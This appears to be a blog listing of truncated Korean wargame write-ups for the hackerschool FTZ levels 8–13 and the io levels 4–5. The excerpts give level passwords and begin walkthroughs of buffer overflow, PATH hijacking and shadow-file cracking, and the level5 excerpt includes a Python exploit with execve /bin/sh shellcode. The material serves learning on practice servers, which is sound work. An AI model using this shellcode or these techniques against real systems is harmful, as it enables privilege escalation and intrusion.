Category : System hacking ssh://ftz.hackerschool.org id : level13 pw : have no clue Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제파일을 확인한다. [level13@ftz level13]$ ls -l 합계 28 -rwsr-x--- 1 level14 level13 13953 3월 8 2003 attackme -rw-r----- 1 root level13 258 3월 8 2003 hint drwxr-xr-x 2 root level13 4096 2월 24 2002 public_html drwxrwxr-x 2 root level13 4096 7월 21 03:58 tmp [level13@ftz level..

Category : System hacking ssh://ftz.hackerschool.org id : level12 pw : it is like this Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제 파일을 확인한다. [level12@ftz level12]$ ls -l 합계 28 -rwsr-x--- 1 level13 level12 13771 3월 8 2003 attackme -rw-r----- 1 root level12 204 3월 8 2003 hint drwxr-xr-x 2 root level12 4096 2월 24 2002 public_html drwxrwxr-x 2 root level12 4096 7월 21 05:15 tmp [level12@ftz ..

level5@io:/tmp/pwn3r$ cat exploit.py #!/usr/bin/python import os TARGET = "/levels/level05" SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" print "[!] Exploit started!" for i in range(0xff , 0x00 , -1): for j in range(0x01 , 0x100 , 100): payload = "" payload += "\x90" * 100 payload += SHELLCODE payload += "\x90" * (40 - len(SHEL..

level4@io:/tmp/.pwn3r$ ls -l /levels/level04* -r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04 -r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c level4@io:/tmp/.pwn3r$ cat /levels/level04.c #include int main() { system("id"); return 0; } level4@io:/tmp/.pwn3r$ ls -l total 12 -rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id -rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c level4@..

Category : System hacking ssh://ftz.hackerschool.org id : level11 pw : what!@#$? Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제 파일을 확인한다. [level11@ftz level11]$ ls -l 합계 28 -rwsr-x--- 1 level12 level11 13733 3월 8 2003 attackme -rw-r----- 1 root level11 168 3월 8 2003 hint drwxr-xr-x 2 root level11 4096 2월 24 2002 public_html drwxrwxr-x 4 root level11 4096 7월 12 13:18 tmp [level11@ftz level1..

Category : System hacking ssh://ftz.hackerschool.org id : level10 pw : interesting to hack! Summary : Tap chatting based on shared memory 서버에 접속하여 문제 파일을 확인한다. [level10@ftz level10]$ ls -l 합계 16 -rw-r----- 1 root level10 253 1월 14 2010 hint drwxr-x--- 2 root root 4096 3월 29 2003 program drwxr-xr-x 2 root level10 4096 2월 24 2002 public_html drwxrwxr-x 2 root level10 4096 7월 12 02:40 tmp [level10..

Category : System hacking ssh://ftz.hackerschool.org id : level9 pw : apple Summary : overflow , overwrite another variable 서버에 접속하여 문제 파일을 확인한다. [level9@ftz level9]$ ls -l 합계 12 -rw-r--r-- 1 root root 391 11월 13 2002 hint drwxr-xr-x 2 root level9 4096 2월 24 2002 public_html drwxrwxr-x 2 root level9 4096 7월 10 02:40 tmp [level9@ftz level9]$ cat hint 다음은 /usr/bin/bof의 소스이다. #include #include #in..

Category : System hacking ssh://ftz.hackerschool.org id : level8 pw : break the world Summary : shadow file crack 서버에 접속하여 문제 파일을 확인한다. [level8@ftz level8]$ ls -l 합계 12 -rw-r----- 1 root level8 109 8월 30 2009 hint drwxr-xr-x 2 root level8 4096 2월 24 2002 public_html drwxrwxr-x 2 root level8 4096 7월 9 10:38 tmp [level8@ftz level8]$ cat hint level9의 shadow 파일이 서버 어딘가에 숨어있다. 그 파일에 대해 알려진 것은 용량이 "2..